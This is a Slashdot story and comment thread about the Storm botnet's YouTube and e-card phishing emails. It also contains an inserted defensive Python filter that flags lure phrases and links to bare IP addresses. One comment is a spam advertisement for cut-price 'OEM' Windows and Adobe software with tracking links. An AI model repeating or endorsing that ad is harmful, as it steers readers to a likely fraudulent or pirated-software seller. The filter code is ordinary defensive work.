
Storm Botnet Is Behind Two New Attacks

kdawson posted more than 7 years ago | from the do-not-click-here dept.

Security 226

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.
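As an added illustration, not part of the Slashdot story or the Exploit Prevention Labs writeup it links to, the snippet below is a small mail-side triage filter for the two lures the summary names (the "face is all over 'net" YouTube bait and the earlier "e-card from a friend" series). It scores each message on two signals: a lure phrase in the subject or body, and a link whose host is a bare IP address rather than a domain name. The bare-IP signal is an assumption added here (a link pointing straight at a compromised home machine usually has no hostname), as are the sample messages, which are constructed and use documentation-only address ranges.

```python
import re
from ipaddress import ip_address

# Constructed sample mailbox (not real captures). Hosts use RFC 5737
# documentation ranges so nothing here points at a live machine.
SAMPLE_MESSAGES = [
    {"id": 1, "subject": "LOL your face is all over 'net",
     "body": "someone put you on youtube, see for yourself\nhttp://203.0.113.57/\n"},
    {"id": 2, "subject": "You've received an e-card from a friend!",
     "body": "View your card at http://198.51.100.22/ecard.exe"},
    {"id": 3, "subject": "Team lunch on Friday",
     "body": "Menu is at https://intranet.example.com/lunch - reply with choices."},
    {"id": 4, "subject": "Confirmation",
     "body": "Your registration is confirmed. Login: http://192.0.2.9/login.php"},
]

# Lure phrases taken from the story; spacing and the apostrophe are tolerated
# because the spam runs vary the wording slightly.
LURE_PATTERNS = [
    re.compile(r"face\s+is\s+all\s+over\s+(the\s+)?'?net", re.I),
    re.compile(r"e-?card\s+from\s+a\s+friend", re.I),
]

# Captures the host part (with optional :port) of any http(s) URL.
URL_RE = re.compile(r"https?://([^/\s]+)", re.I)


def extract_hosts(text):
    """Return the host names of all http(s) links in text, ports stripped."""
    return [m.group(1).split(":")[0] for m in URL_RE.finditer(text)]


def is_bare_ip(host):
    """True when the link host is a literal IPv4/IPv6 address, not a domain."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def score_message(msg):
    """Return a list of human-readable reasons the message looks like a lure.

    An empty list means no signal fired.
    """
    reasons = []
    text = msg["subject"] + "\n" + msg["body"]
    for pat in LURE_PATTERNS:
        if pat.search(text):
            reasons.append("lure phrase matched: " + pat.pattern)
    ip_hosts = [h for h in extract_hosts(text) if is_bare_ip(h)]
    if ip_hosts:
        # Assumption (not from the story): links straight to an IP address
        # are treated as suspicious because bots rarely have a hostname.
        reasons.append("link to bare IP address: " + ", ".join(ip_hosts))
    return reasons


def flag_lures(messages):
    """Map message id -> reasons, for every message with at least one signal."""
    flagged = {}
    for m in messages:
        reasons = score_message(m)
        if reasons:
            flagged[m["id"]] = reasons
    return flagged


if __name__ == "__main__":
    for msg_id, reasons in flag_lures(SAMPLE_MESSAGES).items():
        print(msg_id, "->", "; ".join(reasons))
```

Run against the constructed mailbox, messages 1, 2 and 4 are flagged (message 1 on both signals) and the benign intranet message passes. Phrase matching alone is brittle, which is why the IP-link check is kept as an independent signal: it still fires when the spammers change the bait text, and a message that trips both deserves a closer look than one that trips either.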

226 comments

Ha! (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#20362951)

Never will happen to os x or other *nix systems.

Re:Ha! (5, Insightful)

jcr (53032) | more than 7 years ago | (#20363039)

We don't get infected, but UNIX users still have to deal with the spam that the botnets are spewing.

I am really bloody sick of Microsoft's shoddy work. The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

-jcr

Re:Ha! (0, Flamebait)

mightyQuin (1021045) | more than 7 years ago | (#20363145)

I am really bloody sick of Microsoft's shoddy work.

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

Holy impotence, Batman!

Re:Ha! (4, Insightful)

TheRaven64 (641858) | more than 7 years ago | (#20363165)

Use TCP/IP stack fingerprinting and drop all packets from Microsoft operating systems at the edge of your network until they fix their OS?

We've found solutions; don't use shoddy software. The problem is all of the people who haven't switched yet.

Re:Ha! (3, Insightful)

pe1chl (90186) | more than 7 years ago | (#20363225)

When Microsoft improves their OS to disallow silent installation of software and other administrator-level access to the system, all tweakers and other "helpful sites" fall over each other explaining how this mechanism can be defeated.
This happened with XP SP2, and it happens again with Vista.

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

As long as the situation remains like this, there is little Microsoft can do.
But of course, the whole idea that user-friendliness is more important than security is out of their hat.

Re:Ha! (3, Funny)

MrMr (219533) | more than 7 years ago | (#20363387)

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Re:Ha! (4, Insightful)

cp.tar (871488) | more than 7 years ago | (#20363553)

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Even worse: it's the good-natured Linux users who try to find a balance between Joe User's wants and needs on the one hand, and their own patience and free time on the other.

I tried. I really tried securing my ex-gf's family computer. I opened accounts for everyone. I only left admin privileges on one account. Set everything up.

Everybody just used the admin account again. Not even the fact that each could have their own desktop enticed them to use their own accounts; instead, they had one desktop full of five people's crud.

Re:Ha! (4, Insightful)

dkf (304284) | more than 7 years ago | (#20363581)

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

As long as the situation remains like this, there is little Microsoft can do.
No, they could arrange for the majority of their own user-targeted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges. They could clamp down on giving "Windows Certification" to things like printer drivers that require Admin privs to work (after installation). They could get similarly strict with applications. All those sorts of things. Make life actually workable for people who are running without high privs. And without doing that, they'll never manage to inculcate a culture of security, and there's an awful long way to go there, alas...

(BTW, if you're writing a GUI application for Linux, maybe you should think about taking similar steps. We cannot preach to others if our own house is not in order.)

Re:Ha! (1)

PalmerEldritch42 (754411) | more than 7 years ago | (#20363991)

No, they could arrange for the majority of their own user-targeted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges.

I'm sorry, but are you advocating that an ADMIN account should not be granted read/write access to things? Isn't that sort of the point of an admin account? Further destabilizing the OS is not a good solution to an unstable OS. I'm all for making things work better for the non-admin accounts, in order to allow more people to use them, but I don't think that crippling the admin accounts is a good solution.

Re:Ha! (4, Informative)

WhatAmIDoingHere (742870) | more than 7 years ago | (#20364169)

I think what he meant was you can install but not use the app while logged in as an Administrator account, encouraging people to log in as users.

Re:Ha! ISPs? (1)

ispsuckz (1147837) | more than 7 years ago | (#20363465)

ISPs could block all this spam at their level, but they don't. As much as I blame Microsoft it has a lot to do with the networking world. The networking world is allowing this stuff to happen, probably because engineers would rather make $$$ cracking than defending users from attacks. Telecoms and cable companies want chaos so they can harvest info. You are tripping if you think big companies don't dabble in this stuff. They could stop it, I have seen papers with solutions, they won't implement them though. WGA is another big reason this still goes on.

Re:Ha! ISPs? (1)

WhatAmIDoingHere (742870) | more than 7 years ago | (#20364363)

How, exactly, could ISPs block all the spam? And if they did, what if they block something important? False positives are still an issue. I'm pretty sure the first ISP to figure out how to do that would advertise it and would get TONS of people switching to them.

Re:Ha! (1)

cp.tar (871488) | more than 7 years ago | (#20363591)

I am really bloody sick of Microsoft's shoddy work.

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

Well, to use the GP's analogy, while the houses are still being built out of gasoline-soaked balsa wood, what can we do to stop fires? Disallow high temperatures?

Microsoft's operating systems are currently the main problem. Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do. Especially nothing elegant.

The only elegant solution that comes to mind, really, is OS X. But that's more of an elegant OS than an elegant solution.

Re:Ha! (3, Funny)

ewhenn (647989) | more than 7 years ago | (#20363741)

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.


That's because there is no elegant solution to social eng. attacks. The extent of human ignorance is obscene.

I bet if I sent out some random crap exe to a bunch of people, which when opened it would popup a box that said, "h4ck.exe would like to steal your credit card numbers, shit in your bed, and screw your girlfriend. Would you like to continue?" Ok, or cancel. And some people STILL would click ok.

Re:Ha! (4, Insightful)

Jugalator (259273) | more than 7 years ago | (#20363281)

The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

OK, since you used the word "keeps building", I assume this is about more like Vista than Windows 95.

But if a trojan in Vista asks you to elevate its privileges (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling him he needs to run some shady software under root privileges, and the user saying "yes please, do that now".

Re:Ha! (1)

Jartan (219704) | more than 7 years ago | (#20363479)

But if a trojan in Vista asks you to elevate its privileges (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling him he needs to run some shady software under root privileges, and the user saying "yes please, do that now".

I haven't used Vista but I was under the impression that UAC is really broken because it's constantly spamming you with stupid questions to the point that most people just turn it off?

Re:Ha! (0, Insightful)

Anonymous Coward | more than 7 years ago | (#20363549)

So you're uninformed but still willing to share your opinions?

Re:Ha! (2, Insightful)

Tom (822) | more than 7 years ago | (#20363547)

Technically, yes.

But the user is not a technical system. When you deal with users, you need to follow good user interface guidelines, not just technical, binary thinking. That's where MS - despite their money, years of experience, own research center and all - still produced a total failure. UAC is one of the worst abominations of user interface design ever. You can give an entire presentation on its shortcomings.

Re:Ha! (2, Insightful)

pizzach (1011925) | more than 7 years ago | (#20363825)

No it's not the same. On windows you just click a vague yes or no button. On linux you tend to need to input a password. One of the two makes it painfully obvious you are about to do something to your core system.

Re:Ha! (2, Informative)

DigiShaman (671371) | more than 7 years ago | (#20364523)

But if a trojan in Vista asks you to elevate its privileges (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead?

How about Bitch Slapping the user...HARD!

I swear it, I'm gonna mod a mouse with a capacitor to have two electrodes on its surface. When the user fucks up, they get a nasty shock in the palm of their hand!

Re:Ha! (1)

mattpalmer1086 (707360) | more than 7 years ago | (#20365047)

I didn't read it as being about Vista - "keeps building" says to me the OP means that they keep building insecure systems - i.e. all of them. I doubt very much whether Vista machines are a major component of these huge botnets. Much more likely to be older windows versions.

I do agree that it's the user who is the security hole here, and that wouldn't change even if everyone was running unix rather than windows. Both those systems suffer from a basic design flaw that assumes that all processes should run with the same privileges as the logged-on user. This stems from designs of the late 60s and 70s, in which loading new programs was done by trained and skilled administrators, users of programs were also pretty technically skilled, and very few people were connected to a global network.

Given that things have changed a tad since then, it might be worth considering some new designs, in which all processes are automatically sandboxed and do not run by default with the full privileges of the user launching / installing them. I don't deny that this is a hard thing to get right (UAC is a step in this direction), and ultimately, if an unskilled user says "Yes! Go ahead!" to the dancing pigs, it's on their head. But saying yes to the dancing pigs shouldn't automatically give a trojan access to their network, personal documents, etc. etc.

Re:Ha! (3, Insightful)

kabdib (81955) | more than 7 years ago | (#20363481)

If Unix / Linux was the dominant operating system of the day, who would you be blaming? Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

Let's say that Windows was magically replaced by (say) Ubuntu installs tomorrow, all over the world, with the best known default configuration in terms of being secure. Within a day you'd have exploits, and rapidly growing botnets.

Ideally, *you* would then be ranting about the morons who wrote the kernel, the idiots who did the filtering and mail clients, the jerks who designed the network protocols, and the nincompoops who can't rub two curly braces together without creating a security hole.

Or you could do some research and realize that this stuff is just bloody hard to get right. By anyone. By people who have been doing this their entire careers.

Look, the security holes are *already there* on other platforms. Why aren't you ranting about them?

Meh.

Re:Ha! (3, Interesting)

cp.tar (871488) | more than 7 years ago | (#20363643)

Well, one point in favour of Linux security is the central software repository for each and every distro.

Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

There is still nothing similar in the Windows world.

Re:Ha! (1)

jcr (53032) | more than 7 years ago | (#20364187)

Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

Bullshit. This is an excuse that MS has been using for decades, while they continued to make the same mistakes that UNIX fixed twenty years ago.

-jcr

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20363587)

" but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper." - by jcr (53032) on Sunday August 26, @01:00PM (#20363039)
Oh, really? Ok...

I can show you a custom-hardened build of Windows Server 2003 that blows away setups from the *NIX world as far as security (especially today, in the online world) here, that over 30++ /.'ers outright RAN from:

E.G.-> HARDENING LINUX THREAD @ SLASHDOT WHERE I ISSUED CHALLENGES & A LIST OF THEM TO *NIX FOLKS:

http://it.slashdot.org/comments.pl?sid=267599&cid=20203061 [slashdot.org]

Vs. the 84.735/100 score (now up to 85.185/100 here currently in fact) I can obtain on it & CIS TOOL is such a multiplatform test of security!

(And, it is noted by SANS & COMPUTERWORLD (often cited here on this site no less) as a tool that helps you secure yourself)

I am not using "mere talk" here, but instead verifiable & comparable results from a valid & legitimate security test that runs on Windows NT-based OS, but also FreeBSD, Linux variants of all kinds, & Solaris.

So, so much for this statement which I see here in essence as this, quite often:

"(Insert *NIX variant here) is more secure or securable than Windows"

Well, ok - but, when faced with the challenge of "putting their money where their mouth is"?

Each *NIX user ran (& I specifically wanted SeLinux kernel hook addon users of UBUNTU/KUBUNTU + FreeBSD users to try it especially).

APK

P.S.=> Hey - fact is this (despite the usual "F.U.D." trollers spreading their b.s. about Windows & security, vs. any *NIX:

"Outta-the-box/oem stock"? Most ANY OS is not as secure as possible, & this includes all *NIX variants, period!

This is just a fact, & the URL above where I noted *NIX users ran from a fair test that tests analogs on any OS it runs on (for example, for access & rights to configuration/startup files for the OS tested, & ALL OS' HAVE THAT)?

Especially when I specifically went to a thread post here on this site, about "hardening Linux"??

Well - Not a single *NIX user there could show me they could harden their system to outdo what mine on Windows Server 2003 SP #2 fully patched can achieve...

No one is willing to "backup their bluster" but, they sure TALK BIG - well, new news: Talk's cheap! Show us, prove it... after all - IF you're going to "talk the talk"? WALK THE WALK! apk

Re:Ha! (4, Insightful)

jcr (53032) | more than 7 years ago | (#20364377)

I can show you a custom-hardened build of Windows Server 2003

Umm... So what? You go to great lengths to lock down a windows machine, and good for you. It doesn't help the millions of people affected by the bugs present in a pristine install of any MS product.

-jcr

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20363961)

"The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper."

*ROTFL* Love your expression! :D

Re:Ha! (1)

jcr (53032) | more than 7 years ago | (#20364219)

Love your expression!

Thanks, but I'm not sure I came up with it. It was either me or Hugh Daniel, in a conversation we had many years ago.

-jcr

Re:Ha! (2, Insightful)

nsanders (208050) | more than 7 years ago | (#20363117)

If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies. We are not immune, we are simply not as big of a target because of Windows market share. I don't think the magnitude of the problems would be the same, but to say it will (or could) never happen to *nix or OS X is naive.

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20363427)

"If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies."

The question is, would the end results of these "assaults" have the same impact as targeting M$ systems?

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20364749)

Hey, look at the delusional nutjob!

You truly are an idiot.

Re:Ha! (3, Informative)

uncleFester (29998) | more than 7 years ago | (#20363419)

Never will happen to os x or other *nix systems.

.. and just where the hell do you think the term 'rootkit' came from?

this kind of hubris is what can make osx/linux/whatever a zombie just as fast as anything else out there.

i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... ? and i guess i just imagine those security advisories IBM puts out for AIX...

if you do no work to ensure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

-r

Re:Ha! (1, Insightful)

Anonymous Coward | more than 7 years ago | (#20363505)

Most of the exploits you mention are for server software. Who would run sendmail on their Linux client? You can if you want to but I don't see many windows clients installing a mail server on their machine. Before you blame Unix, get a clue or a brain.

Re:Ha! (1)

The_mad_linguist (1019680) | more than 7 years ago | (#20363637)

Unpatched windows can be completely secure from this attack, as can any other operating system. Just don't connect to the internet!

Re:Ha! (1)

hedwards (940851) | more than 7 years ago | (#20364841)

That was one of the "reasons" why the head of IT at my college said that *nix had such a good reputation for security. Because they were historically not connected to the internet. Balderdash, and he really should have known better than to say that. Unix was around since before the inception of anything resembling modern networking. As of relatively recently, the networking stack for Windows was borrowed from the original stack developed as part of freebsd if memory serves. If memory doesn't serve, then it was one of the other *bsds.

MS didn't get into networking for quite a while after the original networking was done. Even then it wasn't until the mid nineties that they got even halfway serious about it.

*nix would cope better with security problems than Windows does. Mainly due to the fact that Windows is needlessly complicated. Performance-harming bloat is also a security problem: more lines of code are more lines that are potentially buggy, and take much longer to go through for auditing. A leaner OS, especially one which keeps things like browsers separate from the kernel, has a much easier time of hardening. But with Windows, you have explorer whether you web surf or not, and to make matters worse, it is required for updates. Yes, somebody in an enterprise situation could just download the patches on a different machine, but the majority of the people don't have that luxury. And if memory serves, doing so would be a violation of the eula anyways.

Re:Ha! (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20364779)

You're a fscking moron. i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... Duh! They're application, shit ones at that. You're also several years out of date. Gay faggot.

Re:Ha! (1)

Willfon (525161) | more than 7 years ago | (#20364909)

Actually, there are gaping holes in MacOS X as well. If I send out an email with a file attached (eg. .dmg), I can make the recipient install distributed.net, believing he is just getting a business card. Provided of course the user is an administrator and that he opens the business-card-like installer. Not that long ago Apple patched a hole, where code was run when you opened a creatively made .dmg file. New holes keep cropping up, but in the end, the biggest hole is the trusting user who uses the default login user, which is an administrator.

And that hole is the same, no matter if you run Windows, MacOS X, Linux or MyLittlePonyOS

it's time.. (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20362963)

for a toaster rodeo
YEEEE HAAAAW!!

And I'll see your mom at the monster truck show... (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20363131)

...flinging toasters at Bigfoot.

GRrRRAAAAvVVVEEEE DIIIIGgGEEEErRRRR!!!

Storm Botnet (-1, Redundant)

Anonymous Coward | more than 7 years ago | (#20363001)

I for one welcome our Storm Botnet overlords.

I had a 500% increase in Spam on Tuesday Last Week (4, Interesting)

Jennifer York (1021509) | more than 7 years ago | (#20363023)

I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did show us that we need to upgrade our infrastructure.

I fscking hate SPAM!

Re:I had a 500% increase in Spam on Tuesday Last W (1)

omeomi (675045) | more than 7 years ago | (#20363353)

I definitely started to get these "face is all over 'net" SPAMs at about that point in time...I've been getting a few per day since.

Re:I had a 500% increase in Spam on Tuesday Last W (1)

Reaperducer (871695) | more than 7 years ago | (#20363985)

This Slashdot entry, itself, appears to be spam. Neither link provides any information that anyone who's gotten one of these mails didn't already know.

Neither blog provides proof, forensic details, or anything even remotely interesting to a geek seeking out "news for nerds." Just the bare necessary to make it look like it's a well-meaning tech link and not a scheme to inflate someone's page views.

All they are is a couple of paragraphs saying, "Hey, you know all those new spam messages you're getting? They're spam!"

Maybe it's well-intentioned, but as far as I can tell this is just more BlogSpam pretending to be a Slashdot entry. It's getting like freakin' Digg around here these days.

Skynet... (2, Funny)

Colin Smith (2679) | more than 7 years ago | (#20363041)

It's looking for more processing power...

http://www.emhsoft.com/singularity/ [emhsoft.com]

YKIMS!


Brings up a point (1)

gerf (532474) | more than 7 years ago | (#20363315)

Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time.

But noooo, they have to be all evilly criminal types, don't they.

Re:Brings up a point (1)

bmo (77928) | more than 7 years ago | (#20363515)

"Imagine if they put this botnet to a real use, like Seti@Home."

I thought about doing this for folding@home (cure cancer with a virus!), but once you get mondo points, someone's going to ask if you have _legitimate_ access to all those computers. Vijay likes to keep everything above board.

As for seti@home, I'd run it if it wasn't for the idea that I have that as communication gets more advanced, the less there is reliance on sending analogue electromagnetic waves hither and yon through the aether. SETI assumes that other civilizations will be using broadcasting instead of more targeted means of information transfer (cable, fiber optic, etc) and assumes analogue transmission instead of digital. After about 100 years on this planet, broadcast analogue is becoming "old fashioned." How likely is it that we are going to see that gnat's blink 100 or 200 year lifetime of analogue broadcast from other civilizations?

--
BMO

Thank you Microsoft (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20363051)

Without your poor security record and woeful OS, spammers wouldn't have this huge arsenal at their disposal. Furthermore, companies and people wouldn't be spending billions a year fighting this crap. Hope your happy Billyboy Gates!

Re:Thank you Microsoft (2, Funny)

Anonymous Coward | more than 7 years ago | (#20363185)

Hope your happy Billyboy Gates!
Hope my happy Billyboy Gates what?!

Re:Thank you Microsoft (0)

Anonymous Coward | more than 7 years ago | (#20364415)

It was a complete sentence. Gates was meant as a verb.

Re:Thank you Microsoft (4, Funny)

ScentCone (795499) | more than 7 years ago | (#20363725)

Hope your happy Billyboy Gates!

I'm not sure which is worse: unpatched Windows machines, or Linux boxes without the critical patch that allows fanboys to type the word "you're."

i for one welcome (0)

Anonymous Coward | more than 7 years ago | (#20363055)

our toaster-riding overlords.

outage? fat fingered admin more likely (0)

Anonymous Coward | more than 7 years ago | (#20363107)

Nothing to do with Savvis [ltstatus.com] spewing routes all over teh intarwebs [nether.net] ?

(Slashdot's in AS3561)

8 t2c1-p9-0.uk-eal.eu.bt.net (166.49.208.209) 16.189 ms 16.802 ms 15.068 ms
9 t2c1-p5-0-0.us-ash.eu.bt.net (166.49.164.65) 103.232 ms 102.751 ms 102.493 ms
10 cpr2-pos-0-0.VirginiaEquinix.savvis.net (208.173.10.133) 104.467 ms 103.687 ms 105.351 ms
11 er2-tengig2-1.virginiaequinix.savvis.net (204.70.193.102) 104.207 ms 104.050 ms 103.280 ms
12 hr1-tengig8-1.sterling2dc3.savvis.net (204.70.197.81) 108.874 ms 108.533 ms 109.409 ms
MPLS Label 652 TTL=1
13 * * *
14 204.70.196.125 (204.70.196.125) 196.968 ms 264.934 ms 232.841 ms
MPLS Label 16659 TTL=255
15 cr2-loopback.sfo.savvis.net (206.24.210.71) 199.031 ms 345.420 ms 311.107 ms
16 bhr1-pos-0-0.SantaClarasc8.savvis.net (208.172.156.198) 197.105 ms 345.628 ms 311.031 ms
17 csr1-ve240.santaclarasc8.savvis.net (66.35.194.34) 196.651 ms 2413.625 ms 2378.773 ms
18 66.35.212.174 (66.35.212.174) 197.395 ms 341.213 ms 306.301 ms
19 slashdot.org (66.35.250.150) 197.697 ms !5 612.455 ms !5 578.147 ms !5

Hey (1)

Joseph1337 (1146047) | more than 7 years ago | (#20363197)

Does someone know Bill's e-mail (I want to thank him for Windows and the great job he has been putting in for the soft community)? No? Crap...

250k to 10M bots? (0)

Anonymous Coward | more than 7 years ago | (#20363199)

there could be a lot or not a lot

Re:250k to 10M bots? (2, Insightful)

micksam7 (1026240) | more than 7 years ago | (#20363333)

250k is still a lot. Enough to spew 64 gigabits per second of data, assuming each infested machine had a 256k uplink [and ignoring other factors]. That's enough to take out a decent sized datacenter.

On the other end, 10 million could possibly take out an entire ISP, and I'm talking about a backbone ISP too. THAT'S terrifying stuff.

Software at low Pr1ce (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20363243)

OEM software means: no DVD/CD, no packing case, no booklets and no overhead cost!
So OEM software is synonym for lowest price.

Buy directly from the manufacturer, pay for software ONLY and save 75-9O%!

Check our discounts and special offers! Find software for home and office! Different platforms. World leading manufacturers. Instant download.

---- HOT ITEMS

Windows XP Pro + SP2 $49
MS Office Enterprise 2OO7 $79
Adobe Acrobat 8 Pro $79
Microsoft Windows Vista Ult $79
Macromedia Studio 8 $99
Adobe Premiere 2.O $59
Corel Grafix Suite X3 $59
Adobe Illustrator CS2 $59
Macromedia Flash Prof 8 $49
Adobe Photoshop CS2 V9.0 $69
Macromedia Studio 8 $99
Autodesk Autocad 2OO7 $129
Adobe Creative Suite 2 $149
http://dst.potapsoft.com/?568D6001AC9 [potapsoft.com] ----
Top items for Mac:
Adobe Acrobat Pro 7 $69
Adobe After Effects $49
Macromedia Flash Pro 8 $49
Adobe Creative Suite 2 Prem $149
Ableton Live 5.0.1 $49
Adobe Photoshop CS $49
http://dst.potapsoft.com/-software-for-mac-.php?56 8D6001AC9FA9E97D5F40E38178593851&t6 [potapsoft.com]
----
Popular eBooks:
Home Networking For Dummies 3rd Edition $10
Windows XP Gigabook For Dummies $10
Adobe CS2 All in One Desk Reference For Dummies $10
Adobe Photoshop CS2 Classroom in a Book(Adobe Press) $10
----
Find more positions by these manufacturers:
Microsoft...Mac...Adobe...Borland...Macromedia...I BM
http://dst.potapsoft.com/?568D6001AC9FA9E97D5F40E3 8178593851&t4 [potapsoft.com]
----



Gabriel knew he was being arro
Has this baron offended you in
No. Who is he, Johanna? I wont
I want to know... He stopped his
Listen to me, he commanded. Yo

How does the infection spread? (1)

CopaceticOpus (965603) | more than 7 years ago | (#20363265)

I'm curious just how this works - what does a recipient of this email need to do to get infected?

First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

Now, I'd assume no one will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on the brand of browser and/or how recently it has been patched? Is the latest (Oh, let me pick a browser out of a hat here) IE6/IE7 in fully patched form still vulnerable?

Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?

Re:How does the infection spread? (2, Informative)

Lobster Quadrille (965591) | more than 7 years ago | (#20363365)

Generally, you click the link and it takes you to a page that will try one of many (mostly patched) javascript exploits to install malware on your system. I reverse engineered a few of these pages last week and, while they weren't amazingly clever, it is interesting.

If that doesn't work, they usually bring up a page saying something like 'If you are seeing this message, please download our secure login software', along with a link.

I'm surprised they even try something as obvious as this, but I assume that it works to some extent, based on the fact that I'm still getting the spam.

Re:How does the infection spread? (1)

Chris Tucker (302549) | more than 7 years ago | (#20363373)

"Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?"

Yes.

NEVER underestimate the willful stupidity, mind numbing incompetence and insistent ignorance of the typical Windows luser.

The STORM botnet? ALL Windows machines. ALL OF THEM.

Re:How does the infection spread? (1)

garcia (6573) | more than 7 years ago | (#20363385)

First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

Neither SpamAssassin nor GMail's mail filters are nabbing a lot of this stuff at first. I've marked about 15 of them as spam on my website's GMail account and yet similar messages are *still* getting through. I can certainly understand how people are being infected in the first message wave.

Re:How does the infection spread? (3, Insightful)

pe1chl (90186) | more than 7 years ago | (#20363405)

Yes. But remember, the mail message pretends to be something like an e-card from a friend. You have to click on the link to see the e-card.
Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
The next page explains they have to load some software. Not too unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?

So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.

So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).

Re:How does the infection spread? (3, Insightful)

Tom (822) | more than 7 years ago | (#20363599)

Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Exactly. That's as if you had sensors in your clothes to ring a bell every time someone touches you, because he might be a pickpocket. I guarantee you that after one day in the city, you'll turn it off. Or if you can't do that, start to ignore it. Boom, suddenly you are an easier target than you would be without the "alarm system". You got desensitised.

Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypticThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonsenseyouhearonstartreck - do you now want to disallow it not doing it?"

Arggg! (4, Insightful)

JamesRose (1062530) | more than 7 years ago | (#20363285)

